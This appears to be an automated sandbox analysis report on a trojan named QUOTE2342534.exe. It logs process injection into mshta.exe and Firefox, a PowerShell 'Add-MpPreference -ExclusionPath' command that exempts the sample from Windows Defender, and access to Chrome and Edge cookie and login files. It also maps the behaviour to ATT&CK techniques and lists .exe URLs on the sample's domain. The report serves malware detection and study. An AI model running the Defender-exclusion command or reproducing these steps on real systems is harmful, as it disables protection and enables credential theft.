            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtUnmapViewOfSection: Direct from: 0x76EF2D3C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Memory written: C:\Users\user\Desktop\QUOTE2342534.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Section loaded: NULL target: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Section loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe protection: read write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mshta.exe Thread register set: target process: 2672
            Source: C:\Windows\SysWOW64\mshta.exe Thread APC queued: target process: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
            Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Users\user\Desktop\QUOTE2342534.exe VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match, File source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
            [Behavior graph: ID 1541203, Sample: QUOTE2342534.exe, Startdate: 24/10/2024, Architecture: WINDOWS, Score: 100]

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | QUOTE2342534.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
            | QUOTE2342534.exe | 100% | Joe Sandbox ML | | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | |
            | https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | |
            | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
            | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | |
            | https://schema.org | 0% | URL Reputation | safe | |
            | https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | |
            | http://gmpg.org/xfn/11 | 0% | URL Reputation | safe | |
            | https://schema.org/WPHeader | 0% | URL Reputation | safe | |
            | https://schema.org/WPFooter | 0% | URL Reputation | safe | |
            | https://yoast.com/wordpress/plugins/seo/ | 0% | URL Reputation | safe | |
            | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | |
            | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | |
            | https://api.w.org/ | 0% | URL Reputation | safe | |
            | Name | Source | Malicious | Antivirus Detection | Reputation |
                                                                                                                                  unknown
                                                                                                                                  https://www.coba168.info/wp-content/uploads/2024/10/COBA-168-qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.coba168.info/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.coba168.info/#websitemshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.coba168.info/sitemap_index.xmlmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.coba168.info/#organizationqnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTE2342534.exe, 00000000.00000002.2143831590.0000000002B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.coba168.info/?s=mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                unknown
